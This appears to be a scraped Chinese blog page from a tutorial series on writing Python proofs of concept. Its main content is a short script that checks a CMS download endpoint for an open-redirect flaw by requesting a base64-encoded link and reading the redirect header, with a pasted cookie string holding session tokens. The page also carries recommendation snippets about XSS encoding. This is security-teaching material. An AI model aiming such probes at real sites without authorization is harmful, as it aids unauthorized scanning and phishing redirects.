html+%3ca%3e+id,Python大法之从HELL0 MOMO到编写POC(十二)

最新推荐文章于 2023-01-21 15:15:15 发布
最新推荐文章于 2023-01-21 15:15:15 发布
阅读量1.7w 收藏
点赞数
文章标签: html+%3ca%3e+id

[Python] 纯文本查看 复制代码# -*- coding: utf-8 -*-

import requests

def POC(url):

headers = {

'Host': 'localhost',

'Cache-Control': 'max-age=0',

'Upgrade-Insecure-Requests':'1',

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',

'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',

'Accept-Language': 'zh-CN,zh;q=0.8',

'Cookie': '__guid=111872281.1617071225746359600.1514021210290.158; ver=free; passinfo=%E5%85%8D%E8%B4%B9%E7%89%88+%3Ca+href%3D%22http%3A%2F%2Fwww.cmseasy.cn%2Fservice_1.html%22+target%3D%22_blank%22%3E%3Cfont+color%3D%22green%22%3E%28%E8%B4%AD%E4%B9%B0%E6%8E%88%E6%9D%83%29%3C%2Ffont%3E%3C%2Fa%3E; UM_distinctid=160889af2500-062927d1d2a474-5d4e211f-1fa400-160889af251640; CNZZDATA80862620=cnzz_eid%3D600104656-1514116496-%26ntime%3D1514116496; bdshare_firstime=1514120344522; PHPSESSID=93425c5800b892d1625a7e2772e0cc93; AJSTAT_ok_times=1; __tins__4329483=%7B%22sid%22%3A%201514648644160%2C%20%22vd%22%3A%2012%2C%20%22expires%22%3A%201514650918749%7D; __51cke__=; __51laig__=12; CNZZDATA1702264=cnzz_eid%3D481143048-1514986272-%26ntime%3D1514986272; TS4_lang=zh-cn; TS4_TSV4_LOGGED_USER=juVZCAnP1%2F5u%2F08gg%2BV8B3fsJlxLGuip; CNZZDATA1254932726=2083485242-1514986792-http%253A%252F%252Flocalhost%252F%7C1515147524; TS4_TSV4_ACTIVE_TIME=1515152586; ToxD_2132_saltkey=Cy7EYFjC; ToxD_2132_lastvisit=1515217736; ToxD_2132_seccode=2.52b3024ef3cf030111; ToxD_2132_auth=a9d6n%2BIQyXqM8PiyCpPvy3IMoZxhofeEf7OSG0a0ha3YP71Y4GjtOXrUgSX7Fkq%2FEYRz4eD2jrDnDL8jD48T; ToxD_2132_nofavfid=1; ToxD_2132_ulastactivity=bf78u5QlxDtB03kbbeVnmed4IrFbhRildA80nAhmZNbSjbVOc1cc; ToxD_2132_lip=127.0.0.1%2C1515325183; monitor_count=45',

'If-None-Match': '4f94-4ca24c1a3a435',

'If-Modified-Since': 'Thu, 20 Sep 2012 16:38:43 GMT',

'Connection': 'close',

}

attack_url = url + 'plus/download.php?open=1&link=aHR0cDovL2Jicy5pY2h1bnFpdS5jb20%3d'

attack_url_headers = requests.get(attack_url,headers=headers, allow_redirects=False).headers #allow_redirects=False的意义为拒绝默认的301/302重定向从而可以通过attack_url_headers['Location']拿到重定向的URL

if 'bbs.ichunqiu.com' in attack_url_headers['Location']:

print 'Ture'

else:

print 'False'

if __name__ == '__main__':

POC('http://localhost/urlredirectdemo/')

weixin_39632524
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python3实现的国密SM2+SM3
03-15
本文将深入探讨这两个算法以及如何在Python3环境下实现它们。 首先,我们来了解一下SM2算法。SM2是一种基于椭圆曲线密码学(ECC)的公钥加密算法,主要用于数字签名和密钥交换。它在椭圆曲线上定义了一种非对称加密...
html %3ca id=%3e,xss编码小结
weixin_30028221的博客
06-28 1050
一、JS编码与HTML编码区分:HTML实体可以使用十进制与十六进制编码;javascript可以使用Unicode与八进制与十六进制进行编码。二、编码原理区分:三、编码与非编码对于JS编码:1.eval("\u0061\u006c\u0065\u0072\u0074\u0028\u002f\u0078\u0073\u0073\u002f\u0029");(JS Unicode编码)2. eval...
1.bWAPP HTML Injection (HTML注入)
自强不息
01-21 552
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
跨站测试与利用中的绕过技术
cnbird's blog
10-08 1949
1.1 bypass Char 通常有安全意识的程序员往往会对输入进行一定的过滤,比较常见的是针对某一关键符号进行过滤,比如“”,这种方式很多时候是无法防止攻击的,更安全的方式是通过编程语言提供的函数在输出的时候进行过滤。 本节主要针对单字符过滤进行研究,分为引号、尖括号、括号这三个符号进行研究。 1.1.1 引号 在跨站测试中很多的vector(即攻击向量)本身是不包含引号的,例如下
php %3ca href=,www.ahebeiabiding.com
weixin_34768019的博客
04-10 2043
HTTP/1.1 200 OKServer: nginx/1.6.2Date: Sun, 15 Dec 2019 08:00:02 GMTContent-Type: text/html; charset=utf-8Connection: keep-aliveSet-Cookie: PHPSESSID=ul34cmiptjl3i16hg4e490hos4; path=/Expires: Thu, 1...
java 2 %3c%3c 3_JAVA中如何将带%号的编码转换为汉字?
weixin_36361396的博客
02-23 961
%3CtR%3E%3CtD%20align%3Dright%20height%3D20%3E%3Ca%20href%3D%23%3E%u66F4%u591A...%3C/a%3E%3C/TD%3E%3C/tR%3E%3C/tBODY%3E%3C/tABLE%3E%3C/TD%3E%3C/tR%3E%3C/tBODY%3E%3C/tABLE...%3CtR%3E%3CtD%20align%3Drig...
php+%3e%3e%3eeot,HTML URL 编码
weixin_42395498的博客
03-10 1万+
参考网址:http://www.w3schools.com/cn/tags/ref_urlencode.aspURL编码(URLencoding)的作用是将字符转化为可在因特网上安全传输的格式。URL——统一资源定位符Web浏览器通过URL从Web服务器上请求页面。URL就是网页的地址URL编码在因特网上传送URL,只能采用ASCII字符集。但由于URL常常包含ASCII字符集以外的字符,所以我...
html%3ca%3e标签改字体颜色,HTML URL Encoding 参考
热门推荐
weixin_34313368的博客
06-29 6万+
HTML URL Encoding 参考URL - Uniform Resource LocatorWeb browsers request pages from web servers by using a URL.The URL is the address of a web page, like: http://booksky.99lb.net.URL Encoding (Percent E...
Xilinx Spartan-3 3A 3E 3L 全系列原理图库+PCB封装库(AD集成库).zip
04-09
Xilinx Spartan-3 3A 3E 3L 全系列原理图库+PCB封装库(AD集成库).IntLib后缀文件,拆分后文件为PcbLib+SchLib格式,Altium Designer原理图库+PCB封装库,集成库型号列表如下: Library Component Count : 174 ...
Actel ProASIC3 3e 3l SmartFusion IGLO 芯片原理图库+PCB封装库(AD集成库)
12-07
Actel ProASIC3 ProASIC3e 3l SmartFusion IGLO FGPA芯片全系列原理图库+PCB封装库(AD集成库) Actel Axcelerator.IntLib Actel eX.IntLib Actel Fusion.IntLib Actel IGLOO nano.IntLib Actel IGLOO PLUS.IntLib ...
Actel ProASIC3E系列芯片ALTIUM原理图库+PCB封装库(AD集成库).zip
12-09
Actel ProASIC3E系列芯片ALTIUM原理图库+PCB封装库(AD集成库) Library Component Count : 182 Name Description --------------------------------------------------------------------------------------------...
Python Statistics Data Analysis 3e, 新加坡大学教学讲义
04-08
Python Statistics Data Analysis 3e, 新加坡大 学教学讲义 Singapore Management UniversityPer form data collection, data processing, w rangling, visualization, and model build ing using Python Python ...
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
07-17
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
torchaudio-0.13.1+cpu-cp39-cp39-win_amd64.whl
最新发布
07-17
torchaudio软件包,直接下载下来,通过命令窗口输入:pip install torchaudio-xxx.whl安装就行,再也不怕pip安装timeout了
出入库存盘点表-图表分析-分类查询-Excel模板
07-17
【作品名称】:出入库存盘点表-图表分析-分类查询-Excel模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
torchaudio-0.12.1+cpu-cp37-cp37m-win_amd64.whl
07-17
torchaudio软件包,直接下载下来,通过命令窗口输入:pip install torchaudio-xxx.whl安装就行,再也不怕pip安装timeout了
中南大学机械设计课程设计说明书.doc
07-17
说明书
仓库进销出入库存管理系统(带库存预警)-Excel模版
07-17
【作品名称】:仓库进销出入库存管理系统(带库存预警)-Excel模版 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
https://www.sogou.com/web?ie=UTF-8&query=File+%22%2Fusr%2Fbin%2Fyum%22%2C+line+57%2Cin+%3Cmodule%3E+from+dnf.cli+import+main
05-23
这个错误信息可能是由于 `yum` 命令所依赖的 `dnf` 软件包没有正确安装或者版本不兼容导致的。你可以尝试更新 `dnf` 软件包并重新安装 `yum` 命令,具体操作如下: 1. 更新 `dnf` 软件包: ``` sudo dnf upgrade dnf ``` 2. 重新安装 `yum` 命令: ``` sudo dnf install yum ``` 如果上述操作不能解决问题,你可以尝试删除并重装 `dnf` 和 `yum` 软件包,具体操作如下: 1. 删除 `dnf` 和 `yum` 软件包: ``` sudo dnf remove dnf yum ``` 2. 清理残留的配置文件: ``` sudo rm -rf /etc/dnf /etc/yum ``` 3. 重新安装 `dnf` 和 `yum` 软件包: ``` sudo dnf install dnf yum ``` 希望这些方法能够帮助你解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值